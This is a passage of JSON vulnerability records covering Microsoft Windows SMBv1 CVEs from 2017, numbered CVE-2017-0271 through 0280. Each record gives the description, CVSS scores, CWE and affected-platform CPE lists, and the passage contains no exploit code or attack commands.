"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0271", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:33", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0274", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0274", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0274", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:33", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0275", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0275", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:35", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, and CVE-2017-0275.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0276", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0276", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:36", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0272, CVE-2017-0278, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0277", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0277", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0277", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:37", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0272, CVE-2017-0277, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0278", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0278", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:38", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0272, CVE-2017-0277, and CVE-2017-0278.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0279", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0279", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:31", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0277, CVE-2017-0278, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0272", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0272", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:31", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". This CVE ID is unique from CVE-2017-0269 and CVE-2017-0280.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0273", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0273", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:40", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". This CVE ID is unique from CVE-2017-0269 and CVE-2017-0273.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0280", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 